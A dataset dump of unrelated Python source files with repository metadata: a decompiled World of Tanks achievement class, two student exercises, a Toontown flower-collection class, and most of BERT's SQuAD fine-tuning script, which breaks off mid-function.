b8728bf275bb2ca91a768945aac95810d2f474eb | 55647a80c8b412af9df0ba3f50595cc2f29c25e6 | /res/scripts/client/gui/shared/gui_items/dossier/achievements/Achieved.py | abf5a6ed09d5c5dab3a8ed8390af41b1ca9fb8d5 | [] | no_license | cnsuhao/WOT-0.9.17-CT | 0035eb6070fb4fab8d8ee9f8bbc676c10d511cfb | d1f932d8cabaf8aa21708622e87f83c8d24d6451 | refs/heads/master | 2021-06-08T18:11:07.039293 | 2016-11-19T19:12:37 | 2016-11-19T19:12:37 | null | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 668 | py | # 2016.11.19 19:52:48 Střední Evropa (běžný čas)
# Embedded file name: scripts/client/gui/shared/gui_items/dossier/achievements/Achieved.py
from abstract import RegularAchievement
from gui.shared.gui_items.dossier.achievements import validators
class Achieved(RegularAchievement):
@classmethod
def checkIsValid(cls, block, name, dossier):
return validators.alreadyAchieved(cls, name, block, dossier)
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client\gui\shared\gui_items\dossier\achievements\Achieved.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2016.11.19 19:52:48 Střední Evropa (běžný čas)
| [
"[email protected]"
] | |
8051de40984a9a2acb43e21095fbc3aae7026551 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_118/ch23_2020_03_11_11_23_45_741474.py | c6ecc8ea4e87cf6cff5cef2378d5c6e336252e92 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 203 | py | def velocidade(c):
v=(c-80)*5
return v
x = float(input('Qual a velocidade? '))
y=velocidade(x)
if y == 0:
print('Não foi multado')
else:
print ('Foi multado em R$ '' {0:.2f}'.format (y)) | [
"[email protected]"
] | |
b76eebcce6d333ab9eeb6a635d645bcff821d353 | cd4bbecc3f713b0c25508d0c5674d9e103db5df4 | /toontown/estate/FlowerCollection.py | ae519a6213959a49508db54bc4af3e2794d78be4 | [] | no_license | peppythegod/ToontownOnline | dce0351cfa1ad8c476e035aa3947fdf53de916a6 | 2e5a106f3027714d301f284721382cb956cd87a0 | refs/heads/master | 2020-04-20T05:05:22.934339 | 2020-01-02T18:05:28 | 2020-01-02T18:05:28 | 168,646,608 | 11 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,443 | py | import GardenGlobals
from direct.directnotify import DirectNotifyGlobal
import FlowerBase
class FlowerCollection:
notify = DirectNotifyGlobal.directNotify.newCategory('FlowerCollection')
def __init__(self):
self.flowerlist = []
def __len__(self):
return len(self.flowerlist)
def getFlower(self):
return self.flowerlist
def makeFromNetLists(self, speciesList, varietyList):
self.flowerlist = []
for (species, variety) in zip(speciesList, varietyList):
self.flowerlist.append(FlowerBase.FlowerBase(species, variety))
def getNetLists(self):
speciesList = []
varietyList = []
for flower in self.flowerlist:
speciesList.append(flower.getSpecies())
varietyList.append(flower.getVariety())
return [speciesList, varietyList]
def hasFlower(self, species, variety):
for flower in self.flowerlist:
if flower.getSpecies() == species and flower.getVariety(
) == variety:
return 1
continue
return 0
def hasSpecies(self, species):
for flower in self.flowerlist:
if flower.getSpecies() == species:
return 1
continue
return 0
def getInitialVariety(self, species):
retVal = 100000
for flower in self.flowerlist:
if flower.getSpecies() == species:
if flower.getVariety() < retVal:
retVal = flower.getVariety()
flower.getVariety() < retVal
if retVal == 100000:
retVal = 0
return retVal
def _FlowerCollection__collect(self, newFlower, updateCollection):
for flower in self.flowerlist:
if flower.getVariety() == newFlower.getVariety(
) and flower.getSpecies() == newFlower.getSpecies():
return GardenGlobals.COLLECT_NO_UPDATE
continue
if updateCollection:
self.flowerlist.append(newFlower)
return GardenGlobals.COLLECT_NEW_ENTRY
def collectFlower(self, newFlower):
return self._FlowerCollection__collect(newFlower, updateCollection=1)
def __str__(self):
numFlower = len(self.flowerlist)
txt = 'Flower Collection (%s flowers):' % numFlower
for flower in self.flowerlist:
txt += '\n' + str(flower)
return txt
| [
"[email protected]"
] | |
cc462bc85d0d716ae2e44775a9e09ff96c2e6614 | d9f52125601ec26f79202f0e912891b31b60ffc4 | /오전반/30-days-of-code/Day_06/Day_06_YNY.py | 463f620727b012c7231ca35c7a30dd8078ae48fe | [] | no_license | YoungGaLee/2020_Python_coding-study | 5a4f36a39021c89ac773a3a7878c44bf8b0b811f | b876aabc747709afa21035c3afa7e3f7ee01b26a | refs/heads/master | 2022-12-12T13:34:44.729245 | 2020-09-07T04:07:48 | 2020-09-07T04:07:48 | 280,745,587 | 4 | 4 | null | 2020-07-22T03:27:22 | 2020-07-18T21:51:40 | Python | UTF-8 | Python | false | false | 268 | py | n=int(input())
q_odd=[]
q_even=[]
for i in range (n):
q=str(input())
for j in range(len(q)):
if j%2==0:
q_odd.append(q[j])
if j%2==1:
q_even.append(q[j])
print("".join(q_odd) ,"".join(q_even))
q_odd,q_even=[],[]
| [
"[email protected]"
] | |
2aacf7a42a5e5ba680eac760fa60e5e5c13abc8f | 3d69b7fe8fa95fcd6dbab25885f2e3e42bc891d6 | /src/nlp/classification/tf1/bert/run_squad.py | 37118c6db8065cbadf118ecc3b0a13473347453d | [
"Apache-2.0",
"LicenseRef-scancode-public-domain"
] | permissive | wu-uw/OpenCompetition | ac652d066f667dc2b3061947af5ea0425643a1b5 | 9aa9d7a50ada1deb653d295dd8a7fe46321b9094 | refs/heads/master | 2021-01-03T04:59:28.987099 | 2020-03-02T07:49:11 | 2020-03-02T07:49:11 | 239,932,371 | 0 | 0 | Apache-2.0 | 2020-03-02T07:49:12 | 2020-02-12T05:12:02 | Python | UTF-8 | Python | false | false | 51,567 | py | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run BERT on SQuAD 1.1 and SQuAD 2.0."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import json
import math
import os
import random
import modeling
import optimization
import tokenization
import six
import tensorflow as tf
flags = tf.flags
FLAGS = flags.FLAGS
# Required parameters
flags.DEFINE_string(
"bert_config_file", None,
"The config json file corresponding to the pre-trained BERT model. "
"This specifies the model architecture.")
flags.DEFINE_string("vocab_file", None,
"The vocabulary file that the BERT model was trained on.")
flags.DEFINE_string(
"output_dir", None,
"The output directory where the model checkpoints will be written.")
# Other parameters
flags.DEFINE_string("train_file", None,
"SQuAD json for training. E.g., train-v1.1.json")
flags.DEFINE_string(
"predict_file", None,
"SQuAD json for predictions. E.g., dev-v1.1.json or test-v1.1.json")
flags.DEFINE_string(
"init_checkpoint", None,
"Initial checkpoint (usually from a pre-trained BERT model).")
flags.DEFINE_bool(
"do_lower_case", True,
"Whether to lower case the input text. Should be True for uncased "
"models and False for cased models.")
flags.DEFINE_integer(
"max_seq_length", 384,
"The maximum total input sequence length after WordPiece tokenization. "
"Sequences longer than this will be truncated, and sequences shorter "
"than this will be padded.")
flags.DEFINE_integer(
"doc_stride", 128,
"When splitting up a long document into chunks, how much stride to "
"take between chunks.")
flags.DEFINE_integer(
"max_query_length", 64,
"The maximum number of tokens for the question. Questions longer than "
"this will be truncated to this length.")
flags.DEFINE_bool("do_train", False, "Whether to run training.")
flags.DEFINE_bool("do_predict", False, "Whether to run eval on the dev set.")
flags.DEFINE_integer("train_batch_size", 32, "Total batch size for training.")
flags.DEFINE_integer("predict_batch_size", 8,
"Total batch size for predictions.")
flags.DEFINE_float(
"learning_rate",
5e-5,
"The initial learning rate for Adam.")
flags.DEFINE_float("num_train_epochs", 3.0,
"Total number of training epochs to perform.")
flags.DEFINE_float(
"warmup_proportion", 0.1,
"Proportion of training to perform linear learning rate warmup for. "
"E.g., 0.1 = 10% of training.")
flags.DEFINE_integer("save_checkpoints_steps", 1000,
"How often to save the model checkpoint.")
flags.DEFINE_integer("iterations_per_loop", 1000,
"How many steps to make in each estimator call.")
flags.DEFINE_integer(
"n_best_size", 20,
"The total number of n-best predictions to generate in the "
"nbest_predictions.json output file.")
flags.DEFINE_integer(
"max_answer_length", 30,
"The maximum length of an answer that can be generated. This is needed "
"because the start and end predictions are not conditioned on one another.")
flags.DEFINE_bool("use_tpu", False, "Whether to use TPU or GPU/CPU.")
tf.flags.DEFINE_string(
"tpu_name", None,
"The Cloud TPU to use for training. This should be either the name "
"used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 "
"url.")
tf.flags.DEFINE_string(
"tpu_zone", None,
"[Optional] GCE zone where the Cloud TPU is located in. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
tf.flags.DEFINE_string(
"gcp_project", None,
"[Optional] Project name for the Cloud TPU-enabled project. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
tf.flags.DEFINE_string("master", None, "[Optional] TensorFlow master URL.")
flags.DEFINE_integer(
"num_tpu_cores", 8,
"Only used if `use_tpu` is True. Total number of TPU cores to use.")
flags.DEFINE_bool(
"verbose_logging", False,
"If true, all of the warnings related to data processing will be printed. "
"A number of warnings are expected for a normal SQuAD evaluation.")
flags.DEFINE_bool(
"version_2_with_negative", False,
"If true, the SQuAD examples contain some that do not have an answer.")
flags.DEFINE_float(
"null_score_diff_threshold", 0.0,
"If null_score - best_non_null is greater than the threshold predict null.")
class SquadExample(object):
"""A single training/test example for simple sequence classification.
For examples without an answer, the start and end position are -1.
"""
def __init__(self,
qas_id,
question_text,
doc_tokens,
orig_answer_text=None,
start_position=None,
end_position=None,
is_impossible=False):
self.qas_id = qas_id
self.question_text = question_text
self.doc_tokens = doc_tokens
self.orig_answer_text = orig_answer_text
self.start_position = start_position
self.end_position = end_position
self.is_impossible = is_impossible
def __str__(self):
return self.__repr__()
def __repr__(self):
s = ""
s += "qas_id: %s" % (tokenization.printable_text(self.qas_id))
s += ", question_text: %s" % (
tokenization.printable_text(self.question_text))
s += ", doc_tokens: [%s]" % (" ".join(self.doc_tokens))
if self.start_position:
s += ", start_position: %d" % (self.start_position)
if self.start_position:
s += ", end_position: %d" % (self.end_position)
if self.start_position:
s += ", is_impossible: %r" % (self.is_impossible)
return s
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self,
unique_id,
example_index,
doc_span_index,
tokens,
token_to_orig_map,
token_is_max_context,
input_ids,
input_mask,
segment_ids,
start_position=None,
end_position=None,
is_impossible=None):
self.unique_id = unique_id
self.example_index = example_index
self.doc_span_index = doc_span_index
self.tokens = tokens
self.token_to_orig_map = token_to_orig_map
self.token_is_max_context = token_is_max_context
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.start_position = start_position
self.end_position = end_position
self.is_impossible = is_impossible
def read_squad_examples(input_file, is_training):
"""Read a SQuAD json file into a list of SquadExample."""
with tf.gfile.Open(input_file, "r") as reader:
input_data = json.load(reader)["data"]
def is_whitespace(c):
if c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F:
return True
return False
examples = []
for entry in input_data:
for paragraph in entry["paragraphs"]:
paragraph_text = paragraph["context"]
doc_tokens = []
char_to_word_offset = []
prev_is_whitespace = True
for c in paragraph_text:
if is_whitespace(c):
prev_is_whitespace = True
else:
if prev_is_whitespace:
doc_tokens.append(c)
else:
doc_tokens[-1] += c
prev_is_whitespace = False
char_to_word_offset.append(len(doc_tokens) - 1)
for qa in paragraph["qas"]:
qas_id = qa["id"]
question_text = qa["question"]
start_position = None
end_position = None
orig_answer_text = None
is_impossible = False
if is_training:
if FLAGS.version_2_with_negative:
is_impossible = qa["is_impossible"]
if (len(qa["answers"]) != 1) and (not is_impossible):
raise ValueError(
"For training, each question should have exactly 1 answer.")
if not is_impossible:
answer = qa["answers"][0]
orig_answer_text = answer["text"]
answer_offset = answer["answer_start"]
answer_length = len(orig_answer_text)
start_position = char_to_word_offset[answer_offset]
end_position = char_to_word_offset[answer_offset +
answer_length - 1]
# Only add answers where the text can be exactly recovered from the
# document. If this CAN'T happen it's likely due to weird Unicode
# stuff so we will just skip the example.
#
# Note that this means for training mode, every example is NOT
# guaranteed to be preserved.
actual_text = " ".join(
doc_tokens[start_position:(end_position + 1)])
cleaned_answer_text = " ".join(
tokenization.whitespace_tokenize(orig_answer_text))
if actual_text.find(cleaned_answer_text) == -1:
tf.logging.warning(
"Could not find answer: '%s' vs. '%s'",
actual_text,
cleaned_answer_text)
continue
else:
start_position = -1
end_position = -1
orig_answer_text = ""
example = SquadExample(
qas_id=qas_id,
question_text=question_text,
doc_tokens=doc_tokens,
orig_answer_text=orig_answer_text,
start_position=start_position,
end_position=end_position,
is_impossible=is_impossible)
examples.append(example)
return examples
def convert_examples_to_features(examples, tokenizer, max_seq_length,
doc_stride, max_query_length, is_training,
output_fn):
"""Loads a data file into a list of `InputBatch`s."""
unique_id = 1000000000
for (example_index, example) in enumerate(examples):
query_tokens = tokenizer.tokenize(example.question_text)
if len(query_tokens) > max_query_length:
query_tokens = query_tokens[0:max_query_length]
tok_to_orig_index = []
orig_to_tok_index = []
all_doc_tokens = []
for (i, token) in enumerate(example.doc_tokens):
orig_to_tok_index.append(len(all_doc_tokens))
sub_tokens = tokenizer.tokenize(token)
for sub_token in sub_tokens:
tok_to_orig_index.append(i)
all_doc_tokens.append(sub_token)
tok_start_position = None
tok_end_position = None
if is_training and example.is_impossible:
tok_start_position = -1
tok_end_position = -1
if is_training and not example.is_impossible:
tok_start_position = orig_to_tok_index[example.start_position]
if example.end_position < len(example.doc_tokens) - 1:
tok_end_position = orig_to_tok_index[example.end_position + 1] - 1
else:
tok_end_position = len(all_doc_tokens) - 1
(tok_start_position, tok_end_position) = _improve_answer_span(
all_doc_tokens, tok_start_position, tok_end_position, tokenizer,
example.orig_answer_text)
# The -3 accounts for [CLS], [SEP] and [SEP]
max_tokens_for_doc = max_seq_length - len(query_tokens) - 3
# We can have documents that are longer than the maximum sequence length.
# To deal with this we do a sliding window approach, where we take chunks
# of the up to our max length with a stride of `doc_stride`.
_DocSpan = collections.namedtuple( # pylint: disable=invalid-name
"DocSpan", ["start", "length"])
doc_spans = []
start_offset = 0
while start_offset < len(all_doc_tokens):
length = len(all_doc_tokens) - start_offset
if length > max_tokens_for_doc:
length = max_tokens_for_doc
doc_spans.append(_DocSpan(start=start_offset, length=length))
if start_offset + length == len(all_doc_tokens):
break
start_offset += min(length, doc_stride)
for (doc_span_index, doc_span) in enumerate(doc_spans):
tokens = []
token_to_orig_map = {}
token_is_max_context = {}
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in query_tokens:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
for i in range(doc_span.length):
split_token_index = doc_span.start + i
token_to_orig_map[len(
tokens)] = tok_to_orig_index[split_token_index]
is_max_context = _check_is_max_context(
doc_spans, doc_span_index, split_token_index)
token_is_max_context[len(tokens)] = is_max_context
tokens.append(all_doc_tokens[split_token_index])
segment_ids.append(1)
tokens.append("[SEP]")
segment_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
start_position = None
end_position = None
if is_training and not example.is_impossible:
# For training, if our document chunk does not contain an annotation
# we throw it out, since there is nothing to predict.
doc_start = doc_span.start
doc_end = doc_span.start + doc_span.length - 1
out_of_span = False
if not (tok_start_position >= doc_start and
tok_end_position <= doc_end):
out_of_span = True
if out_of_span:
start_position = 0
end_position = 0
else:
doc_offset = len(query_tokens) + 2
start_position = tok_start_position - doc_start + doc_offset
end_position = tok_end_position - doc_start + doc_offset
if is_training and example.is_impossible:
start_position = 0
end_position = 0
if example_index < 20:
tf.logging.info("*** Example ***")
tf.logging.info("unique_id: %s" % (unique_id))
tf.logging.info("example_index: %s" % (example_index))
tf.logging.info("doc_span_index: %s" % (doc_span_index))
tf.logging.info("tokens: %s" % " ".join(
[tokenization.printable_text(x) for x in tokens]))
tf.logging.info("token_to_orig_map: %s" % " ".join(
["%d:%d" % (x, y) for (x, y) in six.iteritems(token_to_orig_map)]))
tf.logging.info("token_is_max_context: %s" % " ".join([
"%d:%s" % (x, y) for (x, y) in six.iteritems(token_is_max_context)
]))
tf.logging.info("input_ids: %s" %
" ".join([str(x) for x in input_ids]))
tf.logging.info(
"input_mask: %s" % " ".join([str(x) for x in input_mask]))
tf.logging.info("segment_ids: %s" %
" ".join([str(x) for x in segment_ids]))
if is_training and example.is_impossible:
tf.logging.info("impossible example")
if is_training and not example.is_impossible:
answer_text = " ".join(
tokens[start_position:(end_position + 1)])
tf.logging.info("start_position: %d" % (start_position))
tf.logging.info("end_position: %d" % (end_position))
tf.logging.info("answer: %s" %
(tokenization.printable_text(answer_text)))
feature = InputFeatures(
unique_id=unique_id,
example_index=example_index,
doc_span_index=doc_span_index,
tokens=tokens,
token_to_orig_map=token_to_orig_map,
token_is_max_context=token_is_max_context,
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
start_position=start_position,
end_position=end_position,
is_impossible=example.is_impossible)
# Run callback
output_fn(feature)
unique_id += 1
def _improve_answer_span(doc_tokens, input_start, input_end, tokenizer,
orig_answer_text):
"""Returns tokenized answer spans that better match the annotated answer."""
# The SQuAD annotations are character based. We first project them to
# whitespace-tokenized words. But then after WordPiece tokenization, we can
# often find a "better match". For example:
#
# Question: What year was John Smith born?
# Context: The leader was John Smith (1895-1943).
# Answer: 1895
#
# The original whitespace-tokenized answer will be "(1895-1943).". However
# after tokenization, our tokens will be "( 1895 - 1943 ) .". So we can match
# the exact answer, 1895.
#
# However, this is not always possible. Consider the following:
#
    # Question: What country is the top exporter of electronics?
    # Context: The Japanese electronics industry is the largest in the world.
# Answer: Japan
#
# In this case, the annotator chose "Japan" as a character sub-span of
# the word "Japanese". Since our WordPiece tokenizer does not split
# "Japanese", we just use "Japanese" as the annotation. This is fairly rare
# in SQuAD, but does happen.
tok_answer_text = " ".join(tokenizer.tokenize(orig_answer_text))
for new_start in range(input_start, input_end + 1):
for new_end in range(input_end, new_start - 1, -1):
text_span = " ".join(doc_tokens[new_start:(new_end + 1)])
if text_span == tok_answer_text:
return (new_start, new_end)
return (input_start, input_end)
def _check_is_max_context(doc_spans, cur_span_index, position):
"""Check if this is the 'max context' doc span for the token."""
# Because of the sliding window approach taken to scoring documents, a single
# token can appear in multiple documents. E.g.
# Doc: the man went to the store and bought a gallon of milk
# Span A: the man went to the
# Span B: to the store and bought
# Span C: and bought a gallon of
# ...
#
# Now the word 'bought' will have two scores from spans B and C. We only
# want to consider the score with "maximum context", which we define as
# the *minimum* of its left and right context (the *sum* of left and
# right context will always be the same, of course).
#
# In the example the maximum context for 'bought' would be span C since
# it has 1 left context and 3 right context, while span B has 4 left context
# and 0 right context.
best_score = None
best_span_index = None
for (span_index, doc_span) in enumerate(doc_spans):
end = doc_span.start + doc_span.length - 1
if position < doc_span.start:
continue
if position > end:
continue
num_left_context = position - doc_span.start
num_right_context = end - position
score = min(num_left_context, num_right_context) + \
0.01 * doc_span.length
if best_score is None or score > best_score:
best_score = score
best_span_index = span_index
return cur_span_index == best_span_index
def create_model(bert_config, is_training, input_ids, input_mask, segment_ids,
use_one_hot_embeddings):
"""Creates a classification model."""
model = modeling.BertModel(
config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings)
final_hidden = model.get_sequence_output()
final_hidden_shape = modeling.get_shape_list(final_hidden, expected_rank=3)
batch_size = final_hidden_shape[0]
seq_length = final_hidden_shape[1]
hidden_size = final_hidden_shape[2]
output_weights = tf.get_variable(
"cls/squad/output_weights", [2, hidden_size],
initializer=tf.truncated_normal_initializer(stddev=0.02))
output_bias = tf.get_variable(
"cls/squad/output_bias", [2], initializer=tf.zeros_initializer())
final_hidden_matrix = tf.reshape(final_hidden,
[batch_size * seq_length, hidden_size])
logits = tf.matmul(final_hidden_matrix, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
logits = tf.reshape(logits, [batch_size, seq_length, 2])
logits = tf.transpose(logits, [2, 0, 1])
unstacked_logits = tf.unstack(logits, axis=0)
(start_logits, end_logits) = (unstacked_logits[0], unstacked_logits[1])
return (start_logits, end_logits)
def model_fn_builder(bert_config, init_checkpoint, learning_rate,
num_train_steps, num_warmup_steps, use_tpu,
use_one_hot_embeddings):
"""Returns `model_fn` closure for TPUEstimator."""
def model_fn(features, labels, mode, params): # pylint: disable=unused-argument
"""The `model_fn` for TPUEstimator."""
tf.logging.info("*** Features ***")
for name in sorted(features.keys()):
tf.logging.info(
" name = %s, shape = %s" %
(name, features[name].shape))
unique_ids = features["unique_ids"]
input_ids = features["input_ids"]
input_mask = features["input_mask"]
segment_ids = features["segment_ids"]
is_training = (mode == tf.estimator.ModeKeys.TRAIN)
(start_logits, end_logits) = create_model(
bert_config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings)
tvars = tf.trainable_variables()
initialized_variable_names = {}
scaffold_fn = None
if init_checkpoint:
(assignment_map, initialized_variable_names
) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)
if use_tpu:
def tpu_scaffold():
tf.train.init_from_checkpoint(
init_checkpoint, assignment_map)
return tf.train.Scaffold()
scaffold_fn = tpu_scaffold
else:
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
tf.logging.info("**** Trainable Variables ****")
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape,
init_string)
output_spec = None
if mode == tf.estimator.ModeKeys.TRAIN:
seq_length = modeling.get_shape_list(input_ids)[1]
def compute_loss(logits, positions):
one_hot_positions = tf.one_hot(
positions, depth=seq_length, dtype=tf.float32)
log_probs = tf.nn.log_softmax(logits, axis=-1)
loss = -tf.reduce_mean(
tf.reduce_sum(one_hot_positions * log_probs, axis=-1))
return loss
start_positions = features["start_positions"]
end_positions = features["end_positions"]
start_loss = compute_loss(start_logits, start_positions)
end_loss = compute_loss(end_logits, end_positions)
total_loss = (start_loss + end_loss) / 2.0
train_op = optimization.create_optimizer(
total_loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu)
output_spec = tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
loss=total_loss,
train_op=train_op,
scaffold_fn=scaffold_fn)
elif mode == tf.estimator.ModeKeys.PREDICT:
predictions = {
"unique_ids": unique_ids,
"start_logits": start_logits,
"end_logits": end_logits,
}
output_spec = tf.contrib.tpu.TPUEstimatorSpec(
mode=mode, predictions=predictions, scaffold_fn=scaffold_fn)
else:
raise ValueError(
"Only TRAIN and PREDICT modes are supported: %s" % (mode))
return output_spec
return model_fn
def input_fn_builder(input_file, seq_length, is_training, drop_remainder):
"""Creates an `input_fn` closure to be passed to TPUEstimator."""
name_to_features = {
"unique_ids": tf.FixedLenFeature([], tf.int64),
"input_ids": tf.FixedLenFeature([seq_length], tf.int64),
"input_mask": tf.FixedLenFeature([seq_length], tf.int64),
"segment_ids": tf.FixedLenFeature([seq_length], tf.int64),
}
if is_training:
name_to_features["start_positions"] = tf.FixedLenFeature([], tf.int64)
name_to_features["end_positions"] = tf.FixedLenFeature([], tf.int64)
def _decode_record(record, name_to_features):
"""Decodes a record to a TensorFlow example."""
example = tf.parse_single_example(record, name_to_features)
# tf.Example only supports tf.int64, but the TPU only supports tf.int32.
# So cast all int64 to int32.
for name in list(example.keys()):
t = example[name]
if t.dtype == tf.int64:
t = tf.to_int32(t)
example[name] = t
return example
def input_fn(params):
"""The actual input function."""
batch_size = params["batch_size"]
# For training, we want a lot of parallel reading and shuffling.
# For eval, we want no shuffling and parallel reading doesn't matter.
d = tf.data.TFRecordDataset(input_file)
if is_training:
d = d.repeat()
d = d.shuffle(buffer_size=100)
d = d.apply(
tf.contrib.data.map_and_batch(
lambda record: _decode_record(record, name_to_features),
batch_size=batch_size,
drop_remainder=drop_remainder))
return d
return input_fn
RawResult = collections.namedtuple("RawResult",
["unique_id", "start_logits", "end_logits"])
def write_predictions(all_examples, all_features, all_results, n_best_size,
max_answer_length, do_lower_case, output_prediction_file,
output_nbest_file, output_null_log_odds_file):
"""Write final predictions to the json file and log-odds of null if needed."""
tf.logging.info("Writing predictions to: %s" % (output_prediction_file))
tf.logging.info("Writing nbest to: %s" % (output_nbest_file))
example_index_to_features = collections.defaultdict(list)
for feature in all_features:
example_index_to_features[feature.example_index].append(feature)
unique_id_to_result = {}
for result in all_results:
unique_id_to_result[result.unique_id] = result
_PrelimPrediction = collections.namedtuple( # pylint: disable=invalid-name
"PrelimPrediction",
["feature_index", "start_index", "end_index", "start_logit", "end_logit"])
all_predictions = collections.OrderedDict()
all_nbest_json = collections.OrderedDict()
scores_diff_json = collections.OrderedDict()
for (example_index, example) in enumerate(all_examples):
features = example_index_to_features[example_index]
prelim_predictions = []
# keep track of the minimum score of null start+end of position 0
score_null = 1000000 # large and positive
min_null_feature_index = 0 # the paragraph slice with min mull score
null_start_logit = 0 # the start logit at the slice with min null score
null_end_logit = 0 # the end logit at the slice with min null score
for (feature_index, feature) in enumerate(features):
result = unique_id_to_result[feature.unique_id]
start_indexes = _get_best_indexes(result.start_logits, n_best_size)
end_indexes = _get_best_indexes(result.end_logits, n_best_size)
# if we could have irrelevant answers, get the min score of
# irrelevant
if FLAGS.version_2_with_negative:
feature_null_score = result.start_logits[0] + \
result.end_logits[0]
if feature_null_score < score_null:
score_null = feature_null_score
min_null_feature_index = feature_index
null_start_logit = result.start_logits[0]
null_end_logit = result.end_logits[0]
for start_index in start_indexes:
for end_index in end_indexes:
# We could hypothetically create invalid predictions, e.g., predict
# that the start of the span is in the question. We throw out all
# invalid predictions.
if start_index >= len(feature.tokens):
continue
if end_index >= len(feature.tokens):
continue
if start_index not in feature.token_to_orig_map:
continue
if end_index not in feature.token_to_orig_map:
continue
if not feature.token_is_max_context.get(
start_index, False):
continue
if end_index < start_index:
continue
length = end_index - start_index + 1
if length > max_answer_length:
continue
prelim_predictions.append(
_PrelimPrediction(
feature_index=feature_index,
start_index=start_index,
end_index=end_index,
start_logit=result.start_logits[start_index],
end_logit=result.end_logits[end_index]))
if FLAGS.version_2_with_negative:
prelim_predictions.append(
_PrelimPrediction(
feature_index=min_null_feature_index,
start_index=0,
end_index=0,
start_logit=null_start_logit,
end_logit=null_end_logit))
prelim_predictions = sorted(
prelim_predictions,
key=lambda x: (x.start_logit + x.end_logit),
reverse=True)
_NbestPrediction = collections.namedtuple( # pylint: disable=invalid-name
"NbestPrediction", ["text", "start_logit", "end_logit"])
seen_predictions = {}
nbest = []
for pred in prelim_predictions:
if len(nbest) >= n_best_size:
break
feature = features[pred.feature_index]
if pred.start_index > 0: # this is a non-null prediction
tok_tokens = feature.tokens[pred.start_index:(
pred.end_index + 1)]
orig_doc_start = feature.token_to_orig_map[pred.start_index]
orig_doc_end = feature.token_to_orig_map[pred.end_index]
orig_tokens = example.doc_tokens[orig_doc_start:(
orig_doc_end + 1)]
tok_text = " ".join(tok_tokens)
# De-tokenize WordPieces that have been split off.
tok_text = tok_text.replace(" ##", "")
tok_text = tok_text.replace("##", "")
# Clean whitespace
tok_text = tok_text.strip()
tok_text = " ".join(tok_text.split())
orig_text = " ".join(orig_tokens)
final_text = get_final_text(tok_text, orig_text, do_lower_case)
if final_text in seen_predictions:
continue
seen_predictions[final_text] = True
else:
final_text = ""
seen_predictions[final_text] = True
nbest.append(
_NbestPrediction(
text=final_text,
start_logit=pred.start_logit,
end_logit=pred.end_logit))
        # if we didn't include the empty option in the n-best, include it
if FLAGS.version_2_with_negative:
if "" not in seen_predictions:
nbest.append(
_NbestPrediction(
text="", start_logit=null_start_logit,
end_logit=null_end_logit))
# In very rare edge cases we could have no valid predictions. So we
# just create a nonce prediction in this case to avoid failure.
if not nbest:
nbest.append(
_NbestPrediction(text="empty", start_logit=0.0, end_logit=0.0))
assert len(nbest) >= 1
total_scores = []
best_non_null_entry = None
for entry in nbest:
total_scores.append(entry.start_logit + entry.end_logit)
if not best_non_null_entry:
if entry.text:
best_non_null_entry = entry
probs = _compute_softmax(total_scores)
nbest_json = []
for (i, entry) in enumerate(nbest):
output = collections.OrderedDict()
output["text"] = entry.text
output["probability"] = probs[i]
output["start_logit"] = entry.start_logit
output["end_logit"] = entry.end_logit
nbest_json.append(output)
assert len(nbest_json) >= 1
if not FLAGS.version_2_with_negative:
all_predictions[example.qas_id] = nbest_json[0]["text"]
else:
# predict "" iff the null score - the score of best non-null >
# threshold
score_diff = score_null - best_non_null_entry.start_logit - (
best_non_null_entry.end_logit)
scores_diff_json[example.qas_id] = score_diff
if score_diff > FLAGS.null_score_diff_threshold:
all_predictions[example.qas_id] = ""
else:
all_predictions[example.qas_id] = best_non_null_entry.text
all_nbest_json[example.qas_id] = nbest_json
with tf.gfile.GFile(output_prediction_file, "w") as writer:
